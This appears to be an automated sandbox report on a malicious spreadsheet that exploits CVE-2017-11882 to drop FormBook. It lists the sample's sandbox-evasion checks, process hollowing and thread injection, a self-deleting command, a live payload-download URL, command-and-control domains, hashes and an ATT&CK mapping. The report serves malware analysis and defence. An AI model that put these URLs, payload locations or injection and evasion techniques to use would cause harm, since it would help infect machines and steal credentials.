Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 4.2.vbc.exe.25b91f4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.466320044.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2796, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1184	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2752	Thread sleep time: -32547s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1164	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1724	Thread sleep time: -45000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00409A80 rdtsc

5_2_00409A80

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 32547			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000006.00000000.482198616.0000000008392000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.534150021.000000000457A000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.482198616.0000000008392000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0V
Source: explorer.exe, 00000006.00000000.483720913.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.479521551.00000000045CF000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000006.00000000.534150021.000000000457A000.00000004.00000001.sdmp	Binary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________q_
Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00409A80 rdtsc

5_2_00409A80

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A526F8 mov eax, dword ptr fs:[00000030h]		5_2_00A526F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_027226F8 mov eax, dword ptr fs:[00000030h]		8_2_027226F8

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_0040ACC0 LdrLoadDll,

5_2_0040ACC0

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.paradisgrp.com
Source: C:\Windows\explorer.exe	Network Connect: 128.65.195.232 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.uvoyus.com

Sample uses process hollowing technique

Show sources

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: A30000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1764			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread register set: target process: 1764			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: explorer.exe, 00000006.00000000.493433605.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp	Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.493433605.0000000000750000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.493433605.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Rootkit1	Credential API Hooking1	Security Software Discovery321	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading111	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer14	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools11	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion31	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol123	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection612	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Information Discovery113	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information4	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing3	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
(QUOTATION)B-RUS-20061REV2.xlsx	29%	ReversingLabs	Document-OLE.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe	13%	ReversingLabs	Win32.Trojan.Pwsx
C:\Users\Public\vbc.exe	13%	ReversingLabs	Win32.Trojan.Pwsx

Unpacked PE Files

Source	Detection	Scanner	Label	Download
8.0.msiexec.exe.a30000.0.unpack	100%	Avira	HEUR/AGEN.1104764	Download File
5.2.vbc.exe.7cd780.2.unpack	100%	Avira	HEUR/AGEN.1104764	Download File
5.2.vbc.exe.330000.0.unpack	100%	Avira	HEUR/AGEN.1104764	Download File
5.2.vbc.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.2.msiexec.exe.a30000.0.unpack	100%	Avira	HEUR/AGEN.1104764	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://java.sun.com	0%	Avira URL Cloud	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://180.214.239.85/service/rundll32.exe	100%	Avira URL Cloud	malware
www.odysseysailingsantorini.com/cmsr/	0%	Avira URL Cloud	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://www.uvoyus.com/cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEp	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
http://www.paradisgrp.com/cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA==	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.paradisgrp.com	128.65.195.232	true	true	unknown
uvoyus.com	34.102.136.180	true	false	unknown
www.uvoyus.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://180.214.239.85/service/rundll32.exe	true	Avira URL Cloud: malware	unknown
www.odysseysailingsantorini.com/cmsr/	true	Avira URL Cloud: safe	low
http://www.uvoyus.com/cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEp	false	Avira URL Cloud: safe	unknown
http://www.paradisgrp.com/cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA==	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmp	false		high
http://www.windows.com/pctv.	explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp	false		high
http://java.sun.com	explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com	explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.icra.org/vocabulary/.	explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://wellformedweb.org/CommentAPI/	explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000006.00000000.530438928.00000000002C7000.00000004.00000020.sdmp	false		high
http://investor.msn.com/	explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.iis.fhg.de/audioPA	explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.piriform.com/ccleaner	explorer.exe, 00000006.00000000.530438928.00000000002C7000.00000004.00000020.sdmp	false		high
http://computername/printers/printername/.printer	explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low
http://www.%s.comPA	explorer.exe, 00000006.00000000.530688122.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.666125665.0000000002170000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://www.autoitscript.com/autoit3	explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp	false		high
https://support.mozilla.org	explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp	false		high
http://treyresearch.net	explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://servername/isapibackend.dll	explorer.exe, 00000006.00000000.532973112.0000000003E50000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
34.102.136.180	uvoyus.com	United States	15169	GOOGLEUS	false
128.65.195.232	www.paradisgrp.com	Switzerland	29222	INFOMANIAK-ASCH	true
180.214.239.85	unknown	Viet Nam	135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	491355
Start date:	27.09.2021
Start time:	14:03:03
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	(QUOTATION)B-RUS-20061REV2.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@10/10@2/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 10.1% (good quality ratio 9.6%) Quality average: 72.4% Quality standard deviation: 26.5%
HCA Information:	Successful, ratio: 94% Number of executed functions: 128 Number of non-executed functions: 32
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtQueryAttributesFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/491355/sample/(QUOTATION)B-RUS-20061REV2.xlsx

Simulations

Behavior and APIs

Time	Type	Description
14:03:35	API Interceptor	118x Sleep call for process: EQNEDT32.EXE modified
14:03:41	API Interceptor	77x Sleep call for process: vbc.exe modified
14:04:06	API Interceptor	198x Sleep call for process: msiexec.exe modified
14:04:55	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
128.65.195.232	Renewed Contract with Annex1.xlsx	Get hash	malicious	Browse	www.paradisgrp.com/cmsr/?qfVdsr=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA==&zZ4pz=9rbHiH1hJ
128.65.195.232	gB8j5x4VHp.exe	Get hash	malicious	Browse	www.paradisgrp.com/cmsr/?2dg=6l-DZlrx1r&nRjTuH=ujlsVlr2pvax8YP7nc18bZaAxLX0DfE0xdJb95/2nuxvPpcfhrDfh7BHvYCIXMBs3lLU
180.214.239.85	MV HULDA MAERSK.xlsx	Get hash	malicious	Browse	180.214.239.85/service/rundll32.exe
180.214.239.85	TB-000-YT-PR-951.xlsx	Get hash	malicious	Browse	180.214.239.85/registry/rundll32.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.paradisgrp.com	Renewed Contract with Annex1.xlsx	Get hash	malicious	Browse	128.65.195.232
www.paradisgrp.com	gB8j5x4VHp.exe	Get hash	malicious	Browse	128.65.195.232

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
INFOMANIAK-ASCH	E2ecGhjXtG	Get hash	malicious	Browse	185.176.226.19
	Renewed Contract with Annex1.xlsx	Get hash	malicious	Browse	128.65.195.232
	zMPWVyU5xF.exe	Get hash	malicious	Browse	84.16.79.73
	whBvzy3Lkt.exe	Get hash	malicious	Browse	84.16.79.73
	phantom.x86	Get hash	malicious	Browse	93.88.249.1
	gB8j5x4VHp.exe	Get hash	malicious	Browse	128.65.195.232
	am2zWv3TtG.exe	Get hash	malicious	Browse	128.65.195.88
	fsd8ks3VNb.exe	Get hash	malicious	Browse	128.65.195.32
	2UUlKfJYJN.exe	Get hash	malicious	Browse	83.166.138.81
	u3O3kHV2IT.exe	Get hash	malicious	Browse	83.166.138.66
	tS9P6wPz9x.exe	Get hash	malicious	Browse	83.166.155.153
	ransomware.exe	Get hash	malicious	Browse	83.166.155.153
	ransomware.exe	Get hash	malicious	Browse	83.166.155.153
	ZRz0Aq1Rf0.dll	Get hash	malicious	Browse	128.65.195.152
	GkrIJKmWHp.exe	Get hash	malicious	Browse	84.16.73.17
	RrZ6BOnPCG.exe	Get hash	malicious	Browse	84.16.73.17
	MV QU SHAN HAI.xlsx	Get hash	malicious	Browse	84.16.73.17
	PDRgIfT71e.exe	Get hash	malicious	Browse	84.16.73.17
	Spisemuligheds4.exe	Get hash	malicious	Browse	84.16.73.17
	http://quip.com/uPSzAnYlObJf/eFax-	Get hash	malicious	Browse	83.166.136.204
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	201910152133#Ubc1c#Uc8fc#Ubd84#Uc2e0#Uaddc_10115_#Uc9c0#Uc544#Uc774#Ud14c#Ud06c_0.xlsx	Get hash	malicious	Browse	103.133.106.165
	MV HULDA MAERSK.xlsx	Get hash	malicious	Browse	180.214.239.85
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	103.140.251.116
	sora.x86	Get hash	malicious	Browse	14.225.54.61
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	103.140.251.116
	qMRlFBUgJO.exe	Get hash	malicious	Browse	103.151.125.18
	qMRlFBUgJO.exe	Get hash	malicious	Browse	103.151.125.18
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	103.140.251.116
	RFQ Beijing Chengruisi Manufacturing.xlsx	Get hash	malicious	Browse	103.133.106.199
	TB-000-YT-PR-951.xlsx	Get hash	malicious	Browse	180.214.239.85
	6EPlWd2sWk.exe	Get hash	malicious	Browse	103.133.111.221
	qzxyEJNuK1.exe	Get hash	malicious	Browse	103.151.123.50
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	103.140.251.116
	1 Balance_PI Dt. 21.9.2021.xlsx	Get hash	malicious	Browse	103.133.108.160
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	103.140.251.116
	Zam#U00f3wienie zakupu # 49211.exe	Get hash	malicious	Browse	103.141.138.110
	I Ordine di acquisto 49211.ppam	Get hash	malicious	Browse	103.141.138.110
	Compensateur en A37C1_Rev 01.xlsx	Get hash	malicious	Browse	103.133.108.160
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	103.140.251.116
	Hua Joo Success Industry.xlsx	Get hash	malicious	Browse	103.133.106.199

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\Public\vbc.exe	MV HULDA MAERSK.xlsx	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe	MV HULDA MAERSK.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	685568
Entropy (8bit):	7.6030295284828995
Encrypted:	false
SSDEEP:	12288:+11lXTqv/Q7zgVAhTQ4HzW0Ikfda+pv0va7bjndt:qDbsVdu5ID+90vMbjd
MD5:	50568FB6133EE4ED721EE46A3C0A9E98
SHA1:	4897B6F2141395071652F72D34DC3D39EB014A56
SHA-256:	2B1A98ADD215568BB5E1C333321CF0FFE98D9128FA149C4F5A07CE2922750B3E
